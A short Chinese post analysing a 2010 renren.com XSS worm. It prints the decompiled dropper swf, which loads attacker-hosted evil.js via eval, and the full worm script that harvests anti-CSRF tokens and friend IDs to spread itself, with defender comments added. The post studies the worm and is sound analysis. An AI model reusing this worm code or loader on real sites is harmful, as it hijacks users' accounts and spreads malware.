今天大家都发现自己莫名其妙的收到了很多Wish You Were Here @ 2016的站内信。
根据这篇日志 http://blog.renren.com/GetEntry.do?id=413070706&owner=265190042&ref=minifeed 中的代码。其原理就是通过swf运行一段恶意js代码从而获取用户cookie,再向校内服务器发送站内信请求从而传播。
以下为解出的swf
// Decompiled ActionScript (AS2) from the dropper swf.
// `fun` is a JavaScript source string: when run in the embedding page it creates a <script>
// element pointing at the attacker-controlled evil.js and appends it to <head>.
var fun = "var x=document.createElement(\"SCRIPT\");x.src=\"http://n.99081.com/xnxss1/evil.js\"; x.defer=true;document.getElementsByTagName(\"HEAD\")[0].appendChild(x);";
// ExternalInterface.call("eval", ...) hands the string to the host page's eval, so the script runs
// with the page's (renren.com) origin. This Flash->JS bridge is the actual XSS vector; an embed that
// restricts allowScriptAccess would block the call.
flash.external.ExternalInterface.call("eval", fun);
// Then loads the genuine Tudou player into this movie so the swf still looks like a normal video embed.
loadMovie ("http://www.tudou.com/player/outside/player_outside.swf?iid=4120048&default_skin=http://js.tudouui.com/bin/player2/outside/Skin_outside_13.swf&autostart=false&rurl=", this);
以下为调用的js代码
// I'm not a malicious worm.^^;
// Second-stage payload of the "Wish You Were Here @ 2016" renren.com worm, loaded by the swf above.
// Execution is driven by the first character of the `xssdata` cookie (see the switch at the bottom):
// each stage writes the next state into that cookie and re-enters this script through a hidden
// same-site iframe, so the flow survives reloads without any server-side state.
// Defender's note: the cookie name `xssdata`, the two 99081.com hosts and the linezing.com beacon
// below are the observable indicators in this sample.
var evil_js = "http://n.99081.com/xnxss1/evil.js"; // this script (re-injected into each iframe)
var evil_swf = "http://o.99081.com/xnxss/1.swf";   // the dropper swf, placed into the share "summary" field
// Builds an XMLHttpRequest, falling back to the two IE ActiveX flavours; returns false when none exists.
function new_xhr(){
  var request = false;
  try {
    request = new XMLHttpRequest();
  } catch (trymicrosoft) {
    try {
      request = new ActiveXObject("Msxml2.XMLHTTP");
    } catch (othermicrosoft) {
      try {
        request = new ActiveXObject("Microsoft.XMLHTTP");
      } catch (failed) {
        request = false;
      }
    }
  }
  return request;
}
// Strips leading whitespace (entries from document.cookie.split(";") keep a leading space).
function ltrim(s){
  return s.replace( /^\s*/, "");
}
// Returns the value of the `xssdata` cookie (the 8 characters of "xssdata=" are skipped), or the
// string "null" when it is absent. `i` is never declared with var, so it leaks as a global.
function getMyCookies(){
  var myCookies = document.cookie;
  myCookies = myCookies.split(";")
  for(i = 0; i < myCookies.length; i++){
    if(myCookies[i].indexOf("xssdata=")!=-1){
      break;
    }
  }
  if(i<myCookies.length){
    return ltrim(myCookies[i]).substring(8);
  }else{
    return "null";
  }
}
// Replaces the page's #logo2 with a decoy renren logo plus a hidden 1x1 iframe pointing at
// <domain>.renren.com/ajaxProxy.html. The iframe's onload calls inject(), which re-loads this script
// inside the frame — presumably to get a document on the target subdomain so the XHRs below are
// same-origin (inferred, not verifiable from this code alone).
function creatIframe(domain){
  document.getElementById("logo2").innerHTML='<H1><IMG height=35 src="http://s.xnimg.cn/imgpro/logo/logo-renren-120.png" width=120></H1><iframe name="2016" id="2016" onload="inject()" src="http://'+domain+'.renren.com/ajaxProxy.html?ver=2" width=1 height=1 style="display:none;"></iframe>';
}
// Injects this script into the hidden frame. document.frames(...) is an IE-only accessor, which is
// why the worm stops here on other browsers.
function inject(){
  var x = document.frames("2016").document.createElement("SCRIPT");
  x.src = evil_js;
  x.defer = true;
  document.frames("2016").document.getElementsByTagName("HEAD")[0].appendChild(x);
}
// Fires an async request and binds `callback` (passed by name) as the readystatechange handler via
// eval. `request` is assigned without var, so it is a global that the handler functions read directly.
function xhr_send(method,url,data,callback){
  request=new_xhr();
  if (!method){
    method="get";
  }
  request.open(method,url,true);
  if (method=="post"){
    request.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
  }
  eval("request.onreadystatechange = "+callback);
  request.send(data);
}
// Handler for the share-button page: copies the 32 characters found 25 positions after
// 'id="tsc_popShare"' into global `tsc`, prefixes the current cookie value with "|<tsc>|" and
// restarts via the share subdomain. `tsc` is echoed later as the `tsc` form field — presumably a
// per-page anti-CSRF token harvested from the legitimate page; not verifiable here.
function get_tsc() {
  if (request.readyState == 4){
    var tsc_res = request.responseText;
    var tsc_s = tsc_res.indexOf('id="tsc_popShare"')+25;
    var tsc_e = tsc_s+32;
    tsc = tsc_res.substring(tsc_s,tsc_e);
    document.cookie = "xssdata=|"+tsc+"|"+getMyCookies()+";domain=.renren.com"+";expires=Sat, 25 Sep 2010 16:00:00 UTC;path=/";
    parent.creatIframe("share");
  }
}
// Handler for the friends-selector response: takes the 9 characters after every "id:" occurrence,
// quotes each one and stores them as a JSON-style array in the cookie (the "[...]" state), then
// restarts via the share subdomain.
function get_userid(){
  if(request.readyState == 4){
    var uid_res = request.responseText;
    uid_res = uid_res.replace(/"/g, "");
    uid_res = uid_res.split("id:");
    var uid_arr = new Array();
    for(i = 1; i < uid_res.length; i++){
      uid_arr.push('"'+uid_res[i].substring(0,9)+'"');
    }
    uid_arr=uid_arr.toString();
    document.cookie = "xssdata=["+uid_arr+"];domain=.renren.com;expires=Sat, 25 Sep 2010 16:00:00 UTC;path=/";
    parent.creatIframe("share");
  }
}
// After the self-share POST completes: move to the "friend" state and restart via the home subdomain.
function preSend(){
  if(request.readyState == 4){
    document.cookie = "xssdata=friend;domain=.renren.com;expires=Sat, 25 Sep 2010 16:00:00 UTC;path=/";
    parent.creatIframe("home");
  }
}
// Final state: mark the victim "infected" and request a third-party hit-counter image
// (presumably used to count victims).
function count(){
  if(request.readyState == 4){
    document.cookie = "xssdata=infected;domain=.renren.com;expires=Sat, 25 Sep 2010 16:00:00 UTC;path=/";
    var a = new Image();
    a.src="http://img.tongji.linezing.com/1269734/tongji.gif";
  }
}
// Sets the #thread field to 0 when present (its purpose is not determinable from this code).
function noComment(){
  var thread = document.getElementById("thread");
  if(thread){
    thread.value =0;
  }
}
// State machine keyed on the first character of the xssdata cookie:
//   "n": no cookie yet ("null")            -> state "add"
//   "a": fetch share page for tsc           -> state "|<tsc>|add"
//   "|": ids part starts with "a"           -> POST a self-share carrying the swf, then "friend";
//        otherwise ids part is "[...]"      -> POST sharetofriend to those ids, then "infected"
//   "f": fetch the friend list              -> state "[ids]"
//   "[": fetch tsc again                    -> state "|<tsc>|[ids]"
// Every cookie write above uses the same fixed expiry (25 Sep 2010). Past that date a browser discards
// the cookie on write, so the flow never leaves the first stage — effectively a built-in kill date.
switch(getMyCookies().charAt(0)) {
  case "n":
    noComment();
    document.cookie = "xssdata=add;domain=.renren.com;expires=Sat, 25 Sep 2010 16:00:00 UTC;path=/";
    creatIframe("share");
    break;
  case "a":
    xhr_send("get","http://share.renren.com/share/buttonshare.do?link=http://g.cn&title=2016",null,"get_tsc");
    break;
  case "f":
    var url ='http://home.renren.com/friendsSelector.do?p={"init":false,"qkey":"friend","uid":true,"uname":false,"uhead":false,"limit":50,"param":{},"query":"","group":"","net":""}';
    xhr_send("get",url,null,"get_userid");
    break // no ';' in the original; relies on ASI
  case "[":
    xhr_send("get","http://share.renren.com/share/buttonshare.do?link=http://g.cn&title=2016",null,"get_tsc");
    break;
  case "|":
    var temp = getMyCookies().split("|");
    tsc = temp[1];
    var xhr_ids = temp[2];
    if(xhr_ids.charAt(0)=="a"){
      // Self-share POST. The leading null-valued Array.prototype method names in this payload have no
      // purpose determinable from here.
      var data = 'post={"filter":null,"reduceRight":null,"reduce":null,"some":null,"every":null,"forEach":null,"map":null,"link":"http://www.tudou.com/programs/view/PgquuM_LGMs/","type":"10","title":"Pink Floyd - Wish You Were Here","pic":"http://image8.tudou.com/data/imgs/i/004/120/048/m25.jpg","fromno":"0","fromShareId":"0","fromShareOwner":"0","fromname":"1.3333333333333333","fromuniv":"","albumid":"0","largeurl":"","sendcomment":"on","action":"add","auth":"99","body":"Wish You Were Here @ 2016.","summary":"'+evil_swf+'","noteId":0}';
      data += '&tsc=';
      data += tsc;
      xhr_send("post","http://share.renren.com/share/submit.do",data,"preSend");
    }else{
      // Share-to-friends POST using the id array harvested by get_userid().
      var data = "post=";
      data += '{"action":"sharetofriend","ids":'+xhr_ids+',"form":{"link":"http://www.tudou.com/programs/view/PgquuM_LGMs/","type":"10","title":"Pink Floyd - Wish You Were Here","pic":"http://image8.tudou.com/data/imgs/i/004/120/048/m25.jpg","fromno":"0","fromShareId":"0","fromShareOwner":"0","fromname":"1.3333333333333333","fromuniv":"","albumid":"0","largeurl":"","summary":"'+evil_swf+'"},"body":"Wish You Were Here @ 2016.","subject":"Wish You Were Here","noteId":0}';
      data += '&tsc=';
      data += tsc;
      xhr_send("post","http://share.renren.com/share/submit.do",data,"count");
    }
    break;
  default:
    noComment();
    break;
}
不过还好只是对支持ActiveX的IE有用（注入脚本依赖 IE 特有的 document.frames() 接口，其他浏览器在这一步就会失败）。
研究代码ing..先膜拜一下


